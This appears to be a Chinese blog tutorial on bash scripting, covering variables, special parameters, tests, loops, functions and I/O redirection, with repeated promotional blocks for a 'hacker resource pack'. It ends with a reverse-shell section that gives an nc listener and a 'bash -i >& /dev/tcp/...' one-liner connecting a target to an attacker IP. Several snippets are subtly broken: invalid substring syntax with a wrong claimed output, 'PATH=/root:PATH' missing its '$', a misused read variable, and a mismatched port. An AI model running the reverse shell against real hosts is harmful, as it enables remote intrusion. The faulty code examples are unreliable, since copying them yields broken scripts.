解释器
shell命令解释器:sh、ash、bash
echo $SHELL #查看自己linux系统的默认解析器,我的是/bin/bash
$SHELL是一个环境变量,存储当前用户使用的默认shell路径
编写规则
1.shell脚本定义使用#!/bin/bash开头
#!的作用是声明脚本由什么shell解释,如果不定义,就使用默认的shell 单个#的作用是注释
2.创建shell脚本文件之后,要给该文件赋予可执行权限
chmod +x test.sh #或者直接赋予777权限也可以
3.执行shell脚本
有三种不同的方式:./test.sh、bash test.sh、. test.sh
./test.sh 会按照文件中预定指定的解析器进行解析,如果没预先指定就使用系统默认解析器
bash test.sh 指定使用bash解析器,如果bash不存在就使用系统默认解析器
. test.sh 直接使用系统默认解析器
我给大家准备了一份全套的《网络安全入门+进阶学习资源包》包含各种常用工具和黑客技术电子书以及视频教程,需要的小伙伴可以扫描下方二维码或链接免费领取~
变量
定义变量:变量名=变量值
引用变量时,要在变量名前加即变量名`
使用unset进行清除变量值。
#!/bin/bash
num=10
echo $num #输出10
unset num #清除变量值,这里不需要加$
echo $num #不会输出
从键盘读取变量,使用read命令
#!/bin/bash
echo "请输入num1和num2的值";
read num1 num2;
echo "num1=$num1,num2=$num2";
或者使用-p参数,使提示和输入在同一行
#!/bin/bash
read -p "请输入num1和num2的值" num1 num2;
echo "num1=$num1,num2=$num2";
环境变量
使用env命令读取环境变量,内容如下
SHELL=/bin/bash
SUDO_GID=1000
LANGUAGE=en_US.utf8:
SUDO_COMMAND=/usr/bin/su
SUDO_USER=ubuntu
PWD=/home/ubuntu
LOGNAME=root
HOME=/root
LANG=en_US.utf8
LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.wim=01;31:*.swm=01;31:*.dwm=01;31:*.esd=01;31:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36:
PROMPT_COMMAND=history -a;
LESSCLOSE=/usr/bin/lesspipe %s %s
TERM=xterm
LESSOPEN=| /usr/bin/lesspipe %s
USER=root
SHLVL=1
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
SUDO_UID=1000
MAIL=/var/mail/root
_=/usr/bin/env
环境变量的作用:写入其中的变量被设为全局变量,在shell脚本中都可以识别。
那么如何将变量导入到环境变量中呢?(这里是临时写入) 可以使用source命令(可以使用.进行替换)及export命令进行写入 例: test.sh内容如下
#!/bin/bash
export num=20; #export命令将num变量导出到环境变量中,但只是临时写入
接着执行source命令
source test.sh #或. test.sh
然后使用env命令查看环境变量会发现已经添加进去
再写一个shell脚本运行测试一下,保存为testt.sh
#!/bin/bash
echo $num;
可以看到在其他shell脚本中也可以读取该变量
也可以直接将某个文件夹中的文件直接添加到环境变量中,
export PATH=/root:PATH #将/root目录中的文件添加到环境变量中
永久变量
上面使用的export知识设置了临时变量,只有写入到配置文件中才能永久生效。
~/.bashrc是一个配置文件,常用来配置别名、环境变量、路径等等 (要在根目录下进行)
vim ~/.bashrc
然后输入
export PATH=/root:PATH #将/root目录下的文件添加到环境变量
保存退出
source ~/.bashrc #重启该文件即可
已经预设定好的变量
$# 指shell脚本的参数数量
$* 指shell脚本的参数内容
$n 第n个参数是$n
$@ 传给shell脚本的参数独立作为每个字符串输出
$? 命令执行后返回的状态,用于检查上一个命令是否正确执行(0代表正确执行,非0代表命令出错)
$0 当前执行的进程名
$$ 当前执行的进程号
例:
求字符串长度
str="ewhfidcsj"
echo ${#str} #输出字符串长度
按照位数输出字符串
str='abcdefghijk'
echo ${#str:0:4} #输出abcde
test.sh内容如下:
#!/bin/bash
echo 执行的文件名为:$0
echo 该文件的进程号为:$$
echo 第一个参数是:$1
echo 该shell脚本的参数数量为:$#
echo 传递的参数作为一个字符串显示:$*
echo 传递参数独立作为每个字符串显示:$@
echo 最后命令的退出状态:$?
然后使用bash命令执行,并添加参数name age sex 输出如下:
脚本标量
" ":双引号包含的变量会被解释
' ':单引号包含的变量会被当做字符串解释
` `:反引号包含的内容会被当作系统命令,并执行其内容
\ :转义字符,echo命令使用\n \t \r \a的时候需要加-e进行转义
( ):使用括号包裹的内容由子shell完成,不影响当前shell中的变量
{ }:使用大括号包裹的内容在当前shell中执行,会影响当前变量
条件测试
使用test命令测试字符串、文件状态、数值test命令格式:test condition或[condition]
文件测试
即测试文件状态的条件表达式 常用参数:
-e 是否存在
-d 是目录
-f 是文件
-r 可读
-w 可写
-x 可执行
-L 符号连接
-c 是否字符设备
-b 是否块设备
-s 文件非空
直接使用不会有任何回显,需要手动加一些回显,例如:
#!/bin/bash
if test -d test.sh; then
echo "test.sh 是目录"
else
echo "test.sh 不是目录或不存在"
fi
字符串测试
格式:test operate "str"或test "str1" operate "str2"
其中operate可以是:= 两个字符串相等 != 两个字符串不相等 -z 空字符串 -n 非空字符串
命令执行测试
命令控制符
&&: command1 && command2 #前一个命令执行成功才执行右边的命令
||: command1 || command2 #左边的命令未执行成功才执行右边的命令
多重条件判定
-a : 两种情况同时成立才为真
-o : 任意情况为真即可
! : 相反状态
控制语句
if判断语句
格式一:
if [条件1]; then
执行第一段程序
else
执行第二段程序
fi
格式二:
if [条件1]; then
执行第一段程序
elif [条件2];then
执行第二段程序
else
执行第三段程序
fi
例:
#!/bin/bash
read -p "请输出文件夹名:" $dirname
if [ -e $dirname ];then
echo "$dirname存在,即将进入该文件夹"
cd $dirname
echo "即将创建文件test.sh"
touch test.sh
else
echo "$dirname不存在,即将创建该文件夹"
mkdir $dirname
echo "即将进入$dirname文件夹"
cd $dirname
echo "即将创建文件test.sh"
touch test.sh
fi
tree
我给大家准备了一份全套的《网络安全入门+进阶学习资源包》包含各种常用工具和黑客技术电子书以及视频教程,需要的小伙伴可以扫描下方二维码或链接免费领取~
case判断语句
case $变量 in
"变量内容1")
程序1
;; #break的意思
"变量内容2")
程序2
;;
*)
其他程序
exit 1
esac
for循环语句
for((初始值;循环控制;执行命令))
do
程序
done
或
for var in con1 con2 con3...
do
程序
done
while循环语句
while [condition]
do
程序
done
until循环语句
until [condition]
do
程序
done
#当condition成立时退出循环,否则继续执行
函数
函数定义
#!/bin/bash
function test(){
函数内容
}
test #函数调用
函数导入
例:在内容中添加source data.sh #导入data.sh中的函数
shell脚本之间相互调用与重定向
相互调用
函数调用
main.sh脚本内容:
#!/bin/bash
source ./1.sh #加载1.sh
func_1 #调用函数
1.sh脚本内容:
#!/bin/bash
function func_1(){
echo 'success'
}
参数传递
1.sh脚本内容:
#!/bin/bash
name="shizhen"
age="38"
2.sh脚本内容:
#!/bin/bash
source 1.sh
echo "my name is $name ,and my age is $age"
重定向
输出重定向(>和>>)
>的作用是覆盖写入,如果原文件存在内容,会覆盖原本的内容。
#在此之前没有1.txt这个文件
echo "66" > 1.txt
cat 1.txt
#回显66
echo "77" > 1.txt
#此时1.txt中已经有内容
cat 1.txt
#回显77,说明覆盖了原先文件中的内容
>>的作用是追加写入(换行),不会覆盖原先的文件内容。
#此时1.txt中有77
echo "88" >> 1.txt
cat 1.txt
#回显为77和88
>与>>可用tee命令进行替换
tee命令作用是将输出写入文件,并将其传递给标准输出
tee默认进行覆盖写入文件,并输出写入的内容
例如:
echo "hello" | tee 1.txt
#会覆盖1.txt原先内容,将hello写入,并输出hello
当tee命令使用-a参数时,是追加内容并输出追加的部分
例如:
echo "world" | tee -a 1.txt
#会在1.txt中换行追加world,并输出world
cat 1.txt
#会回显hello和world
我给大家准备了一份全套的《网络安全入门+进阶学习资源包》包含各种常用工具和黑客技术电子书以及视频教程,需要的小伙伴可以扫描下方二维码或链接免费领取~
输入重定向(<和<<)
<用于将文件内容传递给命令,而不是通过手动输入
cat < 1.txt #将1.txt内容传递给cat命令,命令输出该文件内容
<<是一种特殊的输入重定向,允许在脚本中之间嵌入多行输入,而不需要使用外部的文件。使用<<指示文档的开始,并指定一个标识符(通常是EOF)来标志
cat命令会接收从<<EOF到EOF之间的所有文本作为输入,常用于嵌入多好文本或为命令提供批量输入结束
例如:
cat <<EOF >test.txt
line1
line2
line3
EOF
#会将输入的这三行文本保存到test.txt中
拓展
shell脚本中,主要是对标准输入、标准输出、标准错误流进行操作。
-
标准输入(stdin:文件描述符
0,即输入流,用于键盘输入。 -
标准输出(stdout:文件描述符
1,即输出流,用于显示器输出。 -
标准错误(stderr:文件描述符
2,用于输出错误信息。 -
/dev/null:空目录,可以用来丢弃任何写入它的设备
-
**&**:可以将标准输出和标准错误合并到同一目标;可以将文件描述符重定向到其他文件描述符;也可以用于后台执行命令
1、&将标准输出和标准错误合并到同一目标
ls sfvid > error_log.txt 2>&1
#sfvid是一个不存在的目录
首先> error_log.txt 将标准输出重定向到error_log.txt中
然后2>&1会将标准错误(2)重定向到标准输出(1),此时标准输出(1)已经被重定向到error_log.txt中,所以标准错误也会被重定向到这个文件中。
2、将文件描述符重定向到其他文件描述符
ls 2>&1
3、后台执行命令
sleep 5 &
在后台启动该命令,不会阻塞当前进程
bash反弹shell
#在攻击机上监听端口
nc -lvnp 1234
#在目标主机上进行反弹shell
bash -i >& /dev/tcp/192.168.0.30/1234 0>&1
-
bash -i以交互模式运行bash shell -
>&是一个特殊重定向符,用来重定向标准输出(1)和标准错误(2)到同一个目标。这里是重定向到/dev/tcp/192.168.0.30/4444 -
/dev/tcp/192.168.0.30/1234是bash的一种特殊文件形式:/dev/tcp/host/prot表示连接到指定主机和端口 -
0>&1表示将标准输入(0)重定向到标准输出1
网络安全学习资源分享:
给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
因篇幅有限,仅展示部分资料,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,请看下方扫描即可前往获取
👉1.成长路线图&学习规划👈
要学习一门新的技术,作为新手一定要先学习成长路线图,方向不对,努力白费。
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
👉2.网安入门到进阶视频教程👈
很多朋友都不喜欢晦涩的文字,我也为大家准备了视频教程,其中一共有21个章节,每个章节都是当前板块的精华浓缩。(全套教程扫描领取哈)
👉3.SRC&黑客文档👈
大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录
SRC技术文籍:
黑客资料由于是敏感资源,这里不能直接展示哦! (全套教程扫描领取哈)
👉4.护网行动资料👈
其中关于HW护网行动,也准备了对应的资料,这些内容可相当于比赛的金手指!
👉5.黑客必读书单👈
👉6.网络安全岗面试题合集👈
当你自学到这里,你就要开始思考找工作的事情了,而工作绕不开的就是真题和面试题。
所有资料共282G,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,可以扫描下方二维码或链接免费领取~
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
